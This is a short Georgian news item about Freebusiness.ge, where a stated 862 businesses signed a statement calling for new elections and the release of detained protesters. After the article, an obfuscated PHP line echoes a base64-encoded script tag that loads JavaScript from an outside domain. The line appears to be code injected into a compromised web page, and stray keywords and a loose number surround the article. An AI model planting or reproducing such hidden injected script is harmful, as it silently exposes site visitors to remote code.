tube
ავერსი jaluzi

www.Freebusiness.ge-ის დამფუძნებელი, გიორგი ჩუგოშვილი აცხადებს, რომ პლატფორმაზე 862 ბიზნესის განცხადებაა შესული.

"- www.Freebusiness.ge -ზე. შემოსულია 862 ბიზნესის განცხადება, ვერიფიცირებულია 445. ხვალ ყველას ვერიფიკაციას გავაკეთებთ! ვისაც არ დაუფიქსირებია პოზიცია და ხალხს აინტერესებს, მაგ კომპანიების სია გამოჩნდება ხუთშაბათს, 13:00-ზე", - წერს ჩუგოშვილი სოციალურ ქსელში.

განცხადებაში ბიზნესები ვითარების დეესკალაციისთვის ახალი არჩევნების ჩატარებასა და აქციებზე დაკავებულების გათავისუფლებას ითხოვენ.

"არსებული კრიზისი გასცდა პარტიული პოლიტიკის საზღვრებს, რაც გარდაუვალი სოციალური და ეკონომიკური საფრთხის წინაშე აყენებს ქვეყანას. აუცილებელია ვითარების რაც შეიძლება სასწრაფო დეესკალაცია. დეესკალაციის ყველაზე პრაგმატული გზა არის ახალი არჩევნების დანიშვნა და ბოლო პროცესების განმავლობაში დაპატიმრებული ადამიანების ახალ წლამდე განთავისუფლება. ჩვენ, ქართული ბიზნესის წარმომადგენლები, ვართ რა პასუხისგებელნი ქვეყნის ბედზე და მის შეუქცევად განვითარებაზე, განურჩევლად ჩვენი პოლიტიკური პრეფერენციებისა ხელს ვაწერთ ამ მოწოდებას და განცხადებას", - წერია განცხადებაში.

109
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");